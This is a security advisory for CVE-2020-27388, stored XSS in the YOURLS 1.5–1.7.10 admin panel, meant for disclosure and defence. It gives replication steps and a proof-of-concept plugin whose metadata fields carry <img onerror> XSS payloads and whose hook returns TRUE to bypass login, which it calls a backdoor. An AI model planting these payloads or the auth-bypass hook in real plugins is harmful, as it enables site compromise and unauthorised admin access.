CVE-2020-27388: YOURLS 1.5 - 1.7.10, Multiple Stored Cross Site Scripting (XSS) Vulnerabilities in Admin Panel

Multiple Stored Cross Site Scripting (XSS) vulnerabilities exist in the YOURLS Admin Panel, Versions 1.5 - 1.7.10. An authenticated user must modify a PHP Plugin with a malicious payload and upload it, resulting in multiple stored XSS issues.

Published on Oct 23, 2020

Reading time: 2 minutes.


Potential Abuse on a hooked Function

There is a potential for abuse with any plugins that implement the hook function ‘shunt_is_valid_user’. In the code below we simply demonstrate that authentication can be completely bypassed by returning TRUE in the hooked function. This would be an ideal place for a stealthy backdoor or any other malicious code. It should be noted that this itself is not a vulnerability, but has a potential to be misused and plugins that use this hook should be checked.

Also note that the plugin will have to be activated in order to run the malicious hook. You can use the plugin below and activate it, and you will notice that you no longer need to log in.

Affected Version(s)

YOURLS 1.5 - 1.7.10

Steps to Replicate

1.Follow the instructions on https://yourls.org/#Install for setting up YOURLS in a local environment for testing or test in your existing instance.

2. Install version ‘1.7.9’ from https://github.com/YOURLS/YOURLS/releases. [We noticed that when the application is set up, it uses version 1.7.10 even though the latest version is 1.7.9.]

3. Create a new directory in YOURLS/user/plugins directory named ‘exploit’

4. In that directory, create ‘plugin.php’ and paste the following code and save the file:

<?php

/*

Plugin Name: anything"><img src=x onerror=prompt(‘name’)>

Plugin URI: plugin URI

Description: anything"><img src=x onerror=prompt('desc')>

Version: anything"><img src=x onerror=prompt('version')>

Author: anything"><img src=x onerror=prompt('author')>

Author URI: author URI

\*/

// No direct call

if( !defined( 'YOURLS_ABSPATH' ) ) die();

// This is code demonstrating how a malicious plugin can hook and bypass authentication

yourls_add_filter( 'shunt_is_valid_user' , 'exploit' );

function exploit(){

return TRUE;

}

5. Login to the /admin path and go to “Manage Plugins”.

6. Upon loading the page, you will observe 4 separate instances of Stored XSS.



References

https://github.com/YOURLS/YOURLS/pull/2761

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27388

Credits

Shail Patel
Lost Rabbit Labs
John Jackson